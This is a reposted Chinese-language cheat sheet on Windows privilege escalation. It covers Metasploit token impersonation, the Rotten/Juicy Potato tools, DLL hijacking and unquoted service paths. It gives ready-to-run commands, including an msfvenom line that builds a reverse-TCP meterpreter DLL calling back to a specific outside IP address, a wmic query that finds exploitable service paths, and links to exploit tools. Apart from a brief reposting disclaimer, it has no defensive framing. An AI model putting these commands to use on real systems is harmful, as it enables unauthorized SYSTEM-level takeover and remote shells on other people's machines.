windows提權篇 msf提權-爛土豆提權-dll劫持提權-不帶引號服務路徑提權


提權 令牌竊取:竊取system用戶的權限,注入system權限的進程

 

#msf自帶模塊竊取  管理員--->系統權限

前提:需要管理員權限

 

 輸入三條命令:

use incognito

list_tokens -u

impersonate_token "NT AUTHORITY\SYSTEM"

 

#爛土豆及升級版(web服務型賬戶權限--> 系統權限)

use incognito  //枚舉有哪些用戶的進程,一般有用戶和system用戶

list_tokens -u

execute -cH -f ./rottenpotato.exe  //上傳rottenpotato.exe並執行提權

impersonate_token “NT AUTHORITY\\SYSTEM”

 

#DLL劫持提權應用配合MSF-Web權限

原理:Windows程序啟動的時候需要DLL。如果這些DLL 不存在,則可以通過在應用程序要查找的位置放置惡意DLL來提權。通常,Windows應用程序有其預定義好的搜索DLL的路徑,它會根據下面的順序進行搜索:

1、應用程序加載的目錄

2、C:\Windows\System32

3、C:\Windows\System

4、C:\Windows

5、當前工作目錄Current Working Directory,CWD

6、在PATH環境變量的目錄(先系統后用戶)

過程:信息收集-進程調試-制作dll並上傳-替換dll-啟動應用后成功

msfvenom -p windows/meterpreter/reverse_tcp lhost=101.37.169.46 lport=6677 -f dll >/opt/test.dll

 

#不帶引號服務路徑配合MSF-Web,本地權限

原理:當Windows服務運行時,會發生以下兩種情況之一。如果給出了可執行文件,並且引用了完整路徑,則系統會按字面解釋它並執行。但是,如果服務的二進制路徑未包含在引號中,則操作系統將會執行找到的空格分隔的服務路徑的第一個實例。

過程:檢測引號服務路徑-利用路徑制作文件並上傳-啟用服務或重啟-調用后成功

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """

 

cs也有提權的插件

https://github.com/ohpe/juicy-potato   //2019出的,這個提權工具比較新,好用

https://github.com/foxglovesec/RottenPotato

https://github.com/breenmachine/RottenPotatoNG

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM